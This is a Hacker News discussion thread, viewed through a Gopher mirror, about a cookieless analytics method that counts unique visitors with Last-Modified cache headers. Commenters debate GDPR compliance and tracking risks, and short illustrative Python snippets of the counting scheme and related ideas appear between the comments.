hngopher.com

       [HN Gopher] Using a date-modified header to detect unique visito...
       ___________________________________________________________________
        
       Using a date-modified header to detect unique visitors without
       using cookies
        
       Author : mulhoon
       Score  : 306 points
       Date   : 2022-11-30 16:04 UTC (6 hours ago)
        
 (HTM) web link (notes.normally.com)
 (TXT) w3m dump (notes.normally.com)
        
       | [deleted]
        
       | a_c wrote:
       | Looks like a nice middle ground between no tracking at all and
       | needing full tracking to see how well your website performs. Seems no
       | fingerprinting is involved so the website visitor is anonymized.
       | Unlike cookies where we can store whatever we like, this method
       | reveals only the unique visit, and its derivatives.
        
       | alkonaut wrote:
       | I very much prefer this to e.g. fingerprinting. This is local to
       | one site and basically uniqueness only rather than an identifying
       | id. I don't feel "tracked" or "targeted" by this.
        
       | schoen wrote:
       | Martin Pool discovered pretty much this technique back in 2000:
       | 
       | https://catless.ncl.ac.uk/Risks/20.86.html#subj10.1
        
       | kiriberty wrote:
       | Cringe moment, this is abusing the feature that last-modified
       | was created for
        
       | someweirdperson wrote:
       | "Counting unique visitors"?
       | 
       | They are counting repeated requests. The unique count then is
       | "total requests" minus "repeated requests".
       | 
       | Wouldn't it be easier to count the number of times a cached
       | resource is accessed?
        
         | BeefWellington wrote:
         | Time of last access + a counter of your visits once your hits
         | reach N>2 is probably enough to separate an individual from the
         | crowd here, unless your site is tremendously busy.
        
       | jahewson wrote:
       | The fact that this is being used in an analytics product that
       | claims to be compliant with all privacy laws is horrifying.
       | There's no way this is compliant _and_ it's deceptive.
        
         | andix wrote:
         | I agree. Well crafted laws (like the GDPR) forbid any kind of
         | tracking without consent. It's the what and not the how. It
         | doesn't matter if it's via cookies or any other way.
        
         | pyrolistical wrote:
         | Please explain why this isn't compliant?
        
           | erdos4d wrote:
           | This is a form of data collection and tracking that is
           | definitely against GDPR unless the user is informed of it and
           | consents to it. As it stands, there is no such notification
           | or consent. IANAL but I strongly suspect this will get you fined
           | in the EU.
        
             | pyrolistical wrote:
             | What personal information is being collected here?
        
               | erdos4d wrote:
               | GDPR doesn't just cover personal info, it also forbids
               | tracking without consent, which includes cookies and
               | other means. This is just a technical trick to track
               | someone sans cookie, so I'm 100% certain they will fine
               | anyone doing it unless they get consent.
        
           | whartung wrote:
           | Arguably this can become personally identifiable, much like a
           | person's height of 7 feet becomes personally identifiable. How
           | many 7 foot people live in Elko Nevada? (I have no idea,
           | perhaps there's an entire colony of them.) But most very tall
           | people, well, stand out. "You're that tall guy from Elko!"
           | 
           | Early on, it's not personally identifiable. No doubt there
           | can be a lot of folks visiting the site only 10 times and
           | never again.
           | 
           | But as someone continues to visit, they begin to narrow down
           | who they are to "You're that guy that comes in here every day
           | with a yellow hat". They may not "know" who you are but, they
           | "know" who you are.
           | 
           | Eventually, there may be that one person that has the highest
           | hit rate, who always stands out.
        
             | jefftk wrote:
             | _> there may be that one person that has the highest hit
             | rate, who always stands out._
             | 
             | They could stop incrementing once they get to 10 (or
             | something that's high but common enough to be shared by
             | 1,000s of people).
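
The capping idea in the comment above can be sketched in a few lines. This is only an illustration: the cap of 10 comes from the comment, while the names `MAX_VISITS` and `capped_increment` are hypothetical and not taken from the article.

```python
MAX_VISITS = 10  # hypothetical cap, the "10" suggested in the comment


def capped_increment(visits: int, cap: int = MAX_VISITS) -> int:
    """Increment a visit counter but never let it exceed the cap.

    Once a visitor reaches the cap, they share the same value as every
    other frequent visitor, so the heaviest user no longer stands out.
    """
    return min(visits + 1, cap)
```

With this, a visitor on their 10th and their 250th visit would both carry the same counter value.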
        
             | Spivak wrote:
             | > You're that guy that comes in here every day with a
             | yellow hat
             | 
             | Yes but you have absolutely nothing at all to associate
             | that back to a person. Where are you going to find the data
             | "personal information of some kind of the people who visit
             | your site a lot?" You're not collecting it.
        
           | bpfrh wrote:
           | Because the GDPR isn't about any specific technology, but
           | concerns any processing of personal data:
           | 
           | https://gdpr.eu/what-is-gdpr/
           | 
           | Edit: Huh, I stand corrected I don't know if this would count
           | as personal data.
        
             | eurasiantiger wrote:
             | Storing a cache header is not an issue, but if it is used
             | as a unique identifier for user analytics purposes, it is
             | almost certainly personally identifying information, at
             | least after combining with other data. Since they are not
             | disclosing that they store something they use to ID users,
             | it is likely a GDPR violation, at least in spirit, and that
             | spirit is exactly what GDPR seeks to control.
        
               | bonestamp2 wrote:
               | > after combining with other data
               | 
               | The post says that they don't combine datapoints because
               | that would negate privacy.
        
               | eurasiantiger wrote:
               | _They_ don't but anyone using their service could.
        
               | ATsch wrote:
               | It is personal data regardless of how it is used. The
               | only question is if that use of personal data is
               | permissible.
               | 
               | Using it for user analytics, which is neither required to
               | run the service, nor in the user's interest, nor
               | reasonably expected by the user, is almost definitely
               | illegitimate use.
        
           | jahewson wrote:
           | See my reply to b34r. In addition assigning users into
           | "anonymous" cohorts is a similar principle to FLoC which is
           | likely not GDPR compliant
           | https://searchengineland.com/googles-current-floc-tests-
           | aren...
        
             | tobr wrote:
             | That seems very different, as those cohorts are based on
             | actual personal data (correct me if I've misunderstood this
             | about FLoC). That's fundamentally different from a counter
             | I think.
        
               | jahewson wrote:
               | Yes that's right, FLoC is explicitly using personal data.
               | But now consider that that data is "you visited a
               | gardening website in the past month" and compare it with
               | "you visited this website 3 times yesterday" and the two
               | methods don't look so different.
        
               | tobr wrote:
               | I guess we all have different instincts when it comes to
               | this, but I find it much more expected and acceptable
               | that a website can see that I'm returning, than that they
               | get to know about random other interests I have based on
               | my general browsing history.
        
             | dahfizz wrote:
             | > Processing personal data to generate the cohort
             | assignment without the proper consent could also be a
             | violation
             | 
             | Using personal data to assign a cohort counts as using
             | personal data. Duh. The approach described in the article
             | doesn't use any personal data, though?
        
               | eganist wrote:
               | > Using personal data to assign a cohort counts as using
               | personal data. Duh. The approach described in the article
               | doesn't use any personal data, though?
               | 
               | Quoting the European commission:
               | 
               | "Personal data is any information that relates to an
               | identified or identifiable living individual. Different
               | pieces of information, which collected together can lead
               | to the identification of a particular person, also
               | constitute personal data."
               | 
               | I'd hazard a guess that it's the second part under which
               | the EC might find this to be within scope.
        
               | dahfizz wrote:
               | If I gave you a list of all the last-modified headers
               | from a day, how would you use that information to
               | identify a person?
        
               | ATsch wrote:
               | The definition of personal data under the GDPR is
               | anything that can be used to uniquely identify a natural
               | person (with sufficiently high probability). Both cookies
               | and date-modified meet that definition identically, as do
               | IP addresses.
               | 
               | That doesn't mean you can't use it at all. It just places
               | strong restrictions on what purposes you can use it for.
               | The important point is just that those restrictions are
               | the same under GDPR for all of these technologies. It
               | doesn't matter how you uniquely identify users, what
               | matters is what you do with that information.
        
               | dahfizz wrote:
               | They don't assign a unique date-modified to each user.
               | They assign _everyone_ the _same_ date modified on their
               | first visit of the day. I don't accept that this could
               | be used to uniquely identify a natural person.
               | 
               | You may be able to look at the headers and see that a
               | certain user made the most requests that day. That still
               | tells you nothing about their identity.
        
               | mytailorisrich wrote:
               | Nothing in the technique described here allows to
               | identify an individual directly or indirectly because
               | 'identifiers' are not unique and really no different than
               | standard 'last-modified' dates. Even if they were unique
               | further data would have to be collected in order to be
               | able to identify individuals and turn everything into
               | personal data.
               | 
               | What the technique may fall foul of, though, are cookie
               | laws.
        
             | Spivak wrote:
             | You can't just scare quotes anonymous without explaining
             | how it could deanonymize you. You're sitting there with
             | full access to the count data they collect. Use any
             | statistical methods you like, figure out what visits were
             | me.
        
             | mytailorisrich wrote:
             | The article you quote does not suggest that "assigning
             | users into "anonymous" cohorts is ... is likely not GDPR
             | compliant" and I fail to see how that would be the case.
             | Rather it seems to mention concerns that _processing
             | personal data_ to do so may be problematic.
        
         | b34r wrote:
         | Why? It's anonymous and doesn't collect any user data other
         | than IP and stuff from the user agent
        
           | jahewson wrote:
           | It's not anonymous in a low-entropy situation. A user can be
           | indirectly identified. This would violate GDPR.
        
             | CaveTech wrote:
             | No it wouldn't.
        
               | jahewson wrote:
               | Yes it would because a unique time stamp allows me to
               | indirectly identify a user.
        
               | SparkyMcUnicorn wrote:
               | How?
        
               | kapep wrote:
               | It is not a unique timestamp though. Each day, all
               | visitors start at 00:00:00. All users that visit the site
               | a second time get the timestamp 00:00:01 and so on.
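
The counting scheme described in the comment above might look roughly like the following on the server side. It is a minimal sketch under stated assumptions, not the article's actual implementation: the function name `next_last_modified` is hypothetical, the day boundary is assumed to be UTC midnight, and a header from an earlier day is assumed to reset the counter.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Optional, Tuple


def next_last_modified(if_modified_since: Optional[str],
                       now: datetime) -> Tuple[str, int]:
    """Return (Last-Modified value to send, visits seen before this request)."""
    # Every visitor's first response of the day carries midnight (assumed UTC).
    midnight = now.astimezone(timezone.utc).replace(
        hour=0, minute=0, second=0, microsecond=0)
    visits = 0
    if if_modified_since:
        try:
            seen = parsedate_to_datetime(if_modified_since)
        except (TypeError, ValueError):
            seen = None  # unparseable header: treat as a first visit
        if seen is not None and seen.tzinfo is None:
            seen = seen.replace(tzinfo=timezone.utc)
        # Seconds past midnight encode how many responses this browser
        # has already received today; older dates start over at zero.
        if seen is not None and seen >= midnight:
            visits = int((seen - midnight).total_seconds()) + 1
    stamp = midnight + timedelta(seconds=visits)
    return format_datetime(stamp, usegmt=True), visits
```

A first request (no header) gets `00:00:00`, and a browser that sends that value back gets `00:00:01`, so many visitors share each timestamp.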
        
               | CaveTech wrote:
               | Where are people getting these insane reads of GDPR. Any
               | bit of entropy is not going to violate GDPR. First, an
               | active client-server connection is required for any kind
               | of supposed "identity" contained here, which would of course
               | include far more unique bits of identity/entropy, such as
               | IP. Secondly, even if the full DB of page view counts
               | were leaked you could not actually use it to identify a
               | user.
               | 
               | You have somehow perverted GDPR to believe it to mean `no
               | client may ever hold a unique state`. Good luck to anyone
               | making a claim that this is NOT possible in anything but
               | the most rudimentary application.
        
             | pyrolistical wrote:
             | I don't see how it can be used as described to identify an
             | individual person.
             | 
             | Multiple requests end up with the same time stamp which
             | means individuals are not traceable but as an aggregate
             | countable
        
               | jahewson wrote:
               | Only multiple requests within a given second get the same
               | time stamp. So if you have less than 86k hits per day,
               | then all your time stamps could be unique.
               | 
               | Edit: I misread the article here, where it said each
               | visit incremented the counter by one second. So my
               | calculation is not correct!
        
               | bradstewart wrote:
               | But how do I then tie that unique timestamp to an actual
               | _person_? Which is what GDPR is concerned about.
               | 
               | (edit: spelling)
        
               | dahfizz wrote:
               | How do you go from timestamp to identifying someone?
               | 
               | ~Every HTTP response has a Date field with a second-
               | resolution timestamp that might be unique. Are you
               | equally concerned about that?
        
               | TylerE wrote:
               | Birthday paradox means that will be far lower.
        
               | Thorrez wrote:
               | No, they are truncating the timestamp to the day. So all
               | visitors to the site on a specific day get the same
               | initial timestamp.
        
               | jahewson wrote:
               | Ah so they are, thanks! That's much better. Though for a
               | very, very low-traffic site this would still let me track
               | unique visitors.
        
               | genewitch wrote:
               | It is designed to track unique visitors, but not
               | differentiate between them at all.
               | 
               | both you and i visit the same new site today, we both get
               | a file our browser caches with today's date at 00:00:01.
               | Tomorrow when we go to the same site, our browser says we
               | got the file yesterday, so the server sends a new
               | modified date to the browser, set to tomorrow's date at
               | 00:00:02. Both of us have the same "new" file with the
               | new modification date/time.
               | 
               | if i go back the following day, the only thing the server
               | knows for certain, from just this header, is that i've
               | visited twice before. So i'm not counted as a unique
               | visitor.
               | 
               | That this could be used by assigning a _unique_ timestamp
               | to each visitor is where everyone's mind is going, and
               | it feels like half are annoyed there's another way to
               | leak information, and the other half are annoyed they
               | didn't think of it prior to the end-of-year marketing
               | bonus deadline.
        
         | [deleted]
        
       | prpl wrote:
       | Do people use etag for such purposes?
        
         | cpeterso wrote:
         | Yes. ETag tracking has been a thing for decades:
         | 
         | https://en.wikipedia.org/wiki/HTTP_ETag#Tracking_using_ETags
        
       | habibur wrote:
       | This can be used like a cookie without using cookies as long as
       | definition of cookie stays "...a cookie is a small file stored on
       | your computer".
       | 
       | You have 30 million seconds per year as unique identifier to be
       | used against each individual for tracking. Even though the OP
       | didn't do it.
       | 
       | Put an expire time in between 10 years back to today and 300m
       | users tracked.
        
         | superjan wrote:
         | On the other hand, now that we know about it is easy to defeat:
         | a privacy conscious browser will just add a random amount of
         | minutes/seconds in the "if modified since" header. The only
         | risk is you sometimes trigger a reload because the resource was
         | modified in that interval.
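
The browser-side countermeasure suggested above could be sketched as follows. This is an assumption-laden illustration, not how any real browser behaves: `jitter_if_modified_since` and the one-hour `max_seconds` default are hypothetical choices.

```python
import random
from datetime import timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Optional


def jitter_if_modified_since(value: str, max_seconds: int = 3600,
                             rng: Optional[random.Random] = None) -> str:
    """Add a random number of seconds to a stored Last-Modified value
    before echoing it back as If-Modified-Since."""
    if rng is None:
        rng = random.Random()
    stamp = parsedate_to_datetime(value)
    if stamp.tzinfo is None:
        stamp = stamp.replace(tzinfo=timezone.utc)
    stamp = stamp.astimezone(timezone.utc)
    offset = rng.randint(0, max_seconds)  # inclusive on both ends
    return format_datetime(stamp + timedelta(seconds=offset), usegmt=True)
```

A server that stores a counter in the seconds field would then read back a blurred value instead of the one it set.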
        
           | Kuinox wrote:
           | It's harder, but you still leak bits of information. If the
           | random function is known, statistical analysis can still leak
           | out a bit of information.
        
       | [deleted]
        
       | legitster wrote:
       | Am I missing something? Abusing the cache meta-data to store data
       | on the user device seems much worse than a cookie.
       | 
       | I would have serious doubts of the longevity of such a trick, let
       | alone some of the technical limitations I am sure the service
       | has.
        
         | bonestamp2 wrote:
         | The missing piece is that no fingerprint is involved. They
         | don't have a way of identifying that user, but they are still
         | able to count the number of times that visitor loads the page.
         | So, it's not a tracker, it's a counter. It's like a loyalty
         | punch card at your local sandwich shop -- they can track how
         | many times you've been there by counting the hole punches, but
         | they don't have a unique identifier, so they can't track
         | details about those visits.
         | 
         | On the other hand, a cookie or a browser fingerprint contains
         | info that can uniquely identify that user so it can be used for
         | tracking.
        
           | legitster wrote:
           | A cookie doesn't _have_ to contain a fingerprint though.
           | 
           | In the same way, nothing in their current method necessarily
           | says they couldn't find a way to insert a fingerprint here.
        
             | bonestamp2 wrote:
             | Fair enough. At least they've told us how it works, so if
             | the data no longer matches that methodology in the future
             | then we can speculate that they've implanted a UID, unless
             | they tell us how it works again and the data is consistent
             | with the new methodology.
        
         | o_m wrote:
         | Cookie tracking without consent is illegal in Europe, so it is
         | a clever way to still do some basic web analytics.
        
           | roelschroeven wrote:
           | Tracking without consent is illegal in Europe, _regardless of
           | the method_. Alternative tracking methods are not workarounds
           | to get around the law; they are only workarounds in trying
           | not to be caught.
        
           | atoav wrote:
           | Yeah nice try. Law makers are not _that_ stupid. _Any_ way of
           | storing personal data is subject to this regulation.
           | 
           | And before you try the next thing, personal data is
           | everything that can be linked to a specific user, e.g. IP
           | addresses have been ruled to be personal data, some uuid that
           | helps you identify a user as well.
           | 
           | People should really read the law, and/or at least literate
           | commentary on it instead of assuming things or repeating what
           | someone else assumed.
        
             | mytailorisrich wrote:
             | This is definitely not personal data. The piece of
             | information is not linked to an individual and cannot be
             | used to identify an individual (not the same as a 'user'),
             | not least because it is not unique to each visitor:
             | According to the article all first requests get the same
             | 'last-modified' date, same for all second requests, etc.
             | 
             | Still, this stores data in the browser in a way that might
             | be deemed a technology similar to a cookie, and therefore
             | this might still fall within the various cookie laws, but
             | this is completely outside of personal data regs.
        
           | masklinn wrote:
           | Tracking without consent is illegal. This is a clever way to
           | get absolutely reamed, because you're not only in breach of
           | data protection laws you're actively trying to obfuscate it.
        
             | andix wrote:
             | The obfuscation part is probably irrelevant from a legal
             | perspective.
        
       | baggy_trough wrote:
       | This article is written like it's a great privacy breakthrough
       | but why is this any different from dropping a user id cookie?
        
         | jamincan wrote:
         | Users might block cookies, but this will likely still go
         | through.
        
         | jagged-chisel wrote:
         | How do you get more than 86,400 unique "identifiers" when they
         | only change every second?
        
           | marshray wrote:
           | A malicious site can put a different identifier on every
           | resource loaded by the browser.
           | 
           | There really is no bottom, is there.
        
           | koliber wrote:
           | There are also many timezones and you can encode information
           | in the timezone indicator as well. Also, you can use
           | different days. You can stretch this number into millions.
           | For a website that gets a certain number of unique visitors
           | per year, this may be unique enough.
        
           | tedunangst wrote:
           | Subdomains. (Not sure why I immediately thought subdomains
           | and not just multiple resources.)
        
           | toast0 wrote:
           | who says Last-Modified has to be a current date? you've got
           | the potential for 1669827111 users as of when I was composing
           | this comment without giving your users future dates.
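
To make the privacy concern in the comment above concrete: if a site chose to, it could map an arbitrary integer to a past date and back. The sketch below only illustrates that round trip, and the article says it does not do this. The function names are hypothetical, and the ID is assumed to be a count of seconds since the Unix epoch.

```python
from datetime import datetime, timezone
from email.utils import format_datetime, parsedate_to_datetime


def id_to_last_modified(visitor_id: int) -> str:
    """Encode an integer as an HTTP date (seconds since the Unix epoch)."""
    stamp = datetime.fromtimestamp(visitor_id, tz=timezone.utc)
    return format_datetime(stamp, usegmt=True)


def last_modified_to_id(value: str) -> int:
    """Recover the integer from a date echoed back in If-Modified-Since."""
    return int(parsedate_to_datetime(value).timestamp())
```

Because the browser returns the date verbatim, any distinct past second works as a distinct identifier, which is why per-visitor dates behave like a cookie.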
        
           | WirelessGigabit wrote:
           | You don't have to. A unique visitor is someone who comes in
           | without a last-modified header. Set the header, that person
           | is no longer unique.
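
The counting rule in the comment above reduces to checking for one request header. A minimal sketch, assuming each request is available as a mapping of header names to values (the function name `count_unique_visitors` is hypothetical):

```python
from typing import Iterable, Mapping


def count_unique_visitors(requests: Iterable[Mapping[str, str]]) -> int:
    """Count requests that arrive without an If-Modified-Since header."""
    uniques = 0
    for headers in requests:
        # HTTP header names are case-insensitive.
        names = {name.lower() for name in headers}
        if "if-modified-since" not in names:
            uniques += 1
    return uniques
```

This gives the same figure as "total requests" minus "repeated requests", as long as every repeat request carries the header.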
        
         | nine_k wrote:
         | It is materially different because it does not track individual
         | users.
         | 
         | It's comparable to dropping the same cookie to every visitor on
         | a particular day; a pretty low level of privacy invasion.
         | 
         | Also, this allows to _not_ use such things as visitor's IP
         | address to collect meaningful statistics, which is a privacy
         | win for the user, and an accuracy win for the site operator.
        
           | kevincox wrote:
           | Exactly this. It is different from dropping a user id cookie,
           | but equivalent to dropping a cookie hit_count=0, hit_count=1,
           | ...
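
For comparison, the cookie equivalent mentioned above could be sketched like this. The cookie name `hit_count` comes from the comment. The function name and the choice to restart at 0 on a missing or malformed value are assumptions.

```python
from http.cookies import SimpleCookie


def next_hit_count_cookie(cookie_header: str) -> str:
    """Return the hit_count cookie pair to set, given the request's Cookie header."""
    jar = SimpleCookie()
    jar.load(cookie_header or "")
    try:
        hits = int(jar["hit_count"].value) + 1
    except (KeyError, ValueError):
        hits = 0  # no cookie yet, or a value that is not a number
    return f"hit_count={hits}"
```

As in the date-based scheme, every first-time visitor receives the same value, so the cookie carries a counter and not an identity.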
        
             | baggy_trough wrote:
             | Seems like the hit_count cookie would be a lot more
             | straightforward.
        
         | ChoHag wrote:
        
       | politelemon wrote:
       | If the counter is empty for you, disable your adblocker
       | temporarily. The withcabin.com domain might be blocked.
        
       | dahfizz wrote:
       | Threads like this kinda make me sad about HN. Every single
       | comment is about how this technique might possibly be abused to
       | track users in very specific scenarios (i.e. you may be able to
       | identify your most active user).
       | 
       | If a web server wanted to track you, they would just use your IP.
       | This is a clever technical trick to count your number of users
       | without collecting any personal data. I don't understand why that
       | is such a bad thing?
        
         | zackmorris wrote:
         | I think this cache date trick is clever!
         | 
         | There are at least three fallacies with stuff like GDPR that
         | trigger anxiety in people by convincing them that they can
         | somehow safeguard their own privacy while surfing hundreds of
         | websites per day, many in other countries. I'm not going to
         | fully discredit them, just give counterexamples:
         | 
         | 1) The internet can continue to work without tracking users
         | 
         | - Targeted advertising (can't have both, although I can't say
         | that I'll miss ads)
         | 
         | 2) Users care that companies have their personally identifiable
         | information (PII)
         | 
         | - Users care how companies share and abuse their data for
         | profit (they already know they're being tracked if they don't
         | use something like TorBrowser)
         | 
         | 3) Privacy protections actually result in privacy
         | 
         | - PRISM and similar will always find you:
         | https://en.wikipedia.org/wiki/List_of_government_mass_survei...
         | 
         | So I view all of this security theater with utter skepticism. I
         | think the only thing that can maybe save us is transparency.
         | Letting users download their data and using the threat of audit
         | to keep internet companies honest:
         | 
         | https://securiti.ai/blog/dsar-rights-and-compliance/
         | 
         | The rest of the squabbling about "no that's PII, you can't save
         | that!" has only resulted in endless nagging and distraction.
         | It's like trying to hide your address from the post office or
         | thinking that your phone number is secret because it's not in
         | the phonebook.
         | 
         | Although I do think it's kind of funny to make big companies
         | feel like they're living under a police state. They'll work
         | tirelessly to undermine these protections, which is why we'll
         | eventually abandon them like we did with prohibition and
         | McCarthyism because they just aren't enforceable when everyone
         | is breaking the law. Or (equally likely) they'll work to
         | bolster these laws to create new markets through power
         | imbalance, ensuring that only the largest companies can meet
         | compliance and smaller companies pay some sort of protection
         | money against the threat of litigation, which opens the door to
         | mass corruption. Both of these scenarios are ugly enough that I
         | think this entire rabbit hole is suspect.
        
         | Sohcahtoa82 wrote:
         | > If a web server wanted to track you, they would just use your
         | IP.
         | 
         | I'd think a HN user would know that using an IP to track isn't
         | effective.
         | 
         | For most home desktop users, at best, it tracks an individual
         | household, not a person. For corporate users and highly
         | privacy-conscious home users, it's probably completely
         | worthless as VPNs will make everyone come from a single IP.
         | 
         | For mobile users, it's completely worthless. You'd be tracking
         | users of a specific WiFi network. If your phone is connecting
         | via IPv4, then who knows who you're tracking, as phones on a
         | mobile network will share an IP address.
        
           | ketralnis wrote:
           | And if you think VPN users are too obscure a use case to
           | account for, a specific case I've dealt with is (1) all of
           | AOL coming from one IP in Virginia (yes this was a while ago)
           | and (2) almost every university appearing as a single IP (on
           | a website frequented by university students)
        
             | jgalt212 wrote:
             | As recently as 2006, an entire country was behind a VPN
             | using a single public IP address. If lore can be
             | believed...
             | 
             | https://superuser.com/questions/1013630/why-does-qatar-
             | use-a...
        
             | kccqzy wrote:
             | Universities do that now? When I was in college, if one
             | connects to the visitor network they'd give you a RFC1918
             | address with NAT and a restrictive firewall, but if one
             | connects to the regular network and authenticates as a
             | student, they give you a publicly routable IP address.
        
               | jesprenj wrote:
               | Depends on a lot of factors. The primary school I was a
               | student at had public IPs at every computer, our national
               | academic and research network operators are encouraging
               | local network operators to avoid private IPs. But the
               | high school at which I'm currently a student, has private
               | IP addresses on every computer and a single external IPv4
               | for the entire facility. It's not so one sided.
        
               | lazide wrote:
               | Many will also push http/https proxies regardless of IP
               | addressing schemes, so even if one user bypasses it,
               | anyone using defaults will come from whatever the
               | external proxy IP is.
        
               | ketralnis wrote:
               | I went to a community college that did transparent HTTP
               | proxying with not just deep packet inspection but caching
               | and "security"-oriented javascript injection. Headers
               | would get reordered, and its parser wasn't perfect so
               | multi-line headers would get broken sometimes. They'd
               | inject JS into pages to scan for... something? Other
               | injected JS? I have no idea. But it was impossible to
               | directly connect to another server without going through
               | their proxy even though from the TCP layer it looked like
               | you were. Lots of difficult to debug issues.
        
               | lazide wrote:
               | Wow, that's impressively evil. Right up there with the
               | old 'rewrite DNS traffic' trick from ISPs.
               | 
               | Any idea what make/model the proxy was?
        
             | mike_d wrote:
             | At a previous job we tracked unique visitors to prevent ad
             | fraud. You'd find not only individual IPs with thousands of
             | users behind them, but also larger populations of users
             | numbering in the tens of thousands behind a small block of
             | 8-16 IPs.
             | 
             | The craziest was a large multinational corporation that (I
             | guess for security?) changed their egress IP daily. The
             | first three octets remained the same and the fourth was
             | equal to the day of the month UTC. Really screws things up
             | when you use a 14 day rolling window of previous traffic
             | for comparisons.
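
A minimal sketch of one way to keep a rolling-window comparison stable against the rotating egress address described above: key traffic by its /24 block instead of the full address. The function names and the documentation-range addresses are made up for illustration, and the sketch assumes IPv4 with the first three octets fixed, as in the anecdote.

```python
import ipaddress
from collections import Counter


def egress_key(address: str, prefix_len: int = 24):
    """Collapse an address to its enclosing network (a /24 by default)."""
    # strict=False lets us pass a host address and get its network back.
    return ipaddress.ip_network(f"{address}/{prefix_len}", strict=False)


def requests_per_block(addresses):
    """Count requests per network block rather than per individual IP."""
    return Counter(egress_key(a) for a in addresses)


# One request per day of the month, fourth octet equal to the day.
month = [f"198.51.100.{day}" for day in range(1, 31)]
counts = requests_per_block(month)
```

With this keying, the thirty daily addresses land in a single bucket, so a 14 day window sees one population instead of fourteen unrelated ones. The trade-off is that unrelated users in the same /24 are merged as well.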
        
           | bawolff wrote:
           | I mean, i expect most people who use a vpn to also use
           | incognito mode as well, which i assume would prevent this
           | type of tracking.
        
         | [deleted]
        
         | IshKebab wrote:
         | It's not a clever technical trick. It's a pointless technical
         | trick.
         | 
         | You can do exactly the same thing with cookies and they are
         | better for privacy because there's an opt out mechanism.
         | They're how you're _supposed_ to do this sort of thing.
         | 
         | Using a trick like this is no different to cookies in the eyes
         | of the GDPR. So the only reason to use this trick is if you
         | don't want to respect your users' privacy by letting them
         | block cookies.
        
         | EGreg wrote:
         | I mean, if people wanted to track visitors without cookies,
         | they'd just use etags...
         | 
         | https://www.secjuice.com/etag-entity-tag-tracking/
         | 
         | Has Apple's ITP closed this particular loophole by ignoring
         | etags in third party iframes and capping them to 7 days etc. ?
         | 
         | It seems browsers will want to restrict ALL first party cookies
         | to 7 days unless the visitor explicitly allows some domain to
         | store their identity.
         | 
         | Frankly speaking, identity can be done better without cookies.
         | Look at Web3 sign-ins, we need something built into the browser
         | and seamless. For now maybe an extension. Then browser makers
         | can have a privacy mode that retires cookies, entirely.
         | 
         | But how are you supposed to do caching without storing and
         | sending identifying data equivalent to cookies?
         | 
         | Thoughts?
        
         | fanso99 wrote:
         | My understanding is that most commenters are less critical of
         | this specific implementation, but are alarmed by how this new
         | technique could be used by other more nefarious parties in the
         | future.
         | 
         | Counting visits is probably still not a fully GDPR-compliant
         | use case, as the server stores data on the client's machine
         | which is indistinguishable from a cookie containing a counter.
        
         | tinus_hn wrote:
         | First, an IP address is considered personal data in the EU.
         | 
         | Second, an IP address is not enough, it may change or be
         | shared. The advertisers 'need' to track you forever to serve
         | you relevant ads. So they devise all kinds of tricks to do so.
        
           | aardvarkr wrote:
           | > First, an IP address is considered personal data in the EU.
           | 
           | I don't believe that's true. To my knowledge, GDPR only
           | treats IP address as personal data if it is associated with
           | actual identifying information (like name or address).
           | Collecting IP address alone, and not associating it with
           | anything else, is completely fine (otherwise nginx and
           | apache's default configs would violate GDPR), and through
           | them basically every website would violate GDPR.
        
             | fanso99 wrote:
             | Collecting IP addresses and linking them to a user ID is
             | considered PII as far as I know.
        
               | EGreg wrote:
               | So the idea is that you can't legally collect information
               | in private that you can technically collect.
               | 
               | As long as a company is able to keep it a secret, they
               | won't get caught.
               | 
               | Witness the hundreds of violations of public trust by
               | Facebook:
               | 
               | https://www.independent.co.uk/tech/facebook-app-
               | recording-ca...
               | 
               | The only complete solution is technological!
        
             | mytailorisrich wrote:
             | That's correct. IP addresses are not personal data in
             | themselves but they may become so if further data are
             | collected or accessible which allow individuals to be
             | identified when used together with IP addresses.
        
           | rzzzt wrote:
           | CGNAT complicates matters even further. Sometimes I'm placed
           | way off within <country> if a site tries to go by GeoIP
           | databases, as the provider placed a bunch of households
           | behind a single address.
        
         | JohnFen wrote:
         | After decades of straight-up abuse by this sector of the
         | industry, including the subversion of countless "privacy
         | respecting" data collection techniques, I think an
         | extraordinary amount of skepticism and suspicion is more than
         | understandable.
        
           | kccqzy wrote:
           | Why would you put privacy respecting in quotes? The
           | subversion of those techniques is probably just because
           | those techniques are so new and people haven't had better
           | technologies yet.
           | 
           | I personally consider those privacy respecting data
           | collection techniques as a parallel with the development and
           | use of cryptography on the web. In the beginning pretty much
           | no one online used cryptography; later on we started using
           | them but used weak ones ("export" cipher suites for example,
           | or just look at the issues in early protocols like SSL 2.0 or
           | SSL 3.0); nowadays almost everyone uses strong cryptography.
           | Similarly, in the beginning pretty much no one cared about
           | privacy when they did data collection; then we had begun to
           | care more about privacy, but many schemes are easily broken
           | due to for example misguided ideas of anonymization
           | ("anonymization by hashing"), and we are also starting to see
           | the development of newer private information retrieval
           | schemes and differential privacy, etc. Unlike the cynics on
           | this HN thread, I am quite confident that maybe a decade down
           | the road the majority of data collection done by companies
           | will be in a privacy preserving manner. Of course there will
           | be outliers much like there are still websites that don't use
           | https but those will be few and far between.
        
             | JohnFen wrote:
             | I quoted the term not with the intention of disparaging the
             | notion, but to indicate that I'm referring to a specific
             | class of approaches. That said, the term has also been
             | abused to the point where when it's used, I immediately
             | doubt that it's accurate.
        
         | mozman wrote:
         | Fingerprinting using WebRTC is far more effective. IPs are
         | useless.
        
         | nottorp wrote:
         | We tend to object to people considering it normal to track us.
         | Regardless of means.
        
           | dahfizz wrote:
           | This is not tracking. Could you explain why you think it is?
        
             | fanso99 wrote:
             | Storing a cookie with a counter still requires consent
             | afaik. If I am right, then this technique is not
             | sufficiently different and also requires consent.
        
               | robertlagrant wrote:
               | Why would that require consent?
        
               | chriswarbo wrote:
               | Consent is _always_ required; even if you just give
               | people a random UUID, with no associated session /etc.,
               | that _always_ requires consent.
               | 
               | There is a separate question, of whether consent is
               | implied. If the identifying information is required to
               | provide the user with a service they requested (e.g. a
               | cookie for their online shopping cart), then consent is
               | implied; no need to ask.
        
             | nottorp wrote:
             | Could you explain why i should care, considering the
             | current climate online?
             | 
             | When you try to cram a list of 500 "legitimate interests"
             | down my throat, I will consider no interest as legitimate.
             | 
             | No matter what your goals are, you're in an industry that
             | has zero trust these days.
        
               | dahfizz wrote:
               | Without viable alternatives, sites will continue to use
               | Google Analytics. If people like you fear-monger every
               | alternative, sites will continue to use Google Analytics.
               | 
               | The method described in the article collects no personal
               | data, collects no identifiable data, and is objectively
               | more user-respecting than Google Analytics. But the
               | behavior by people like you will help make sure that
               | these alternatives don't gain traction and Google
               | maintains their monopoly.
        
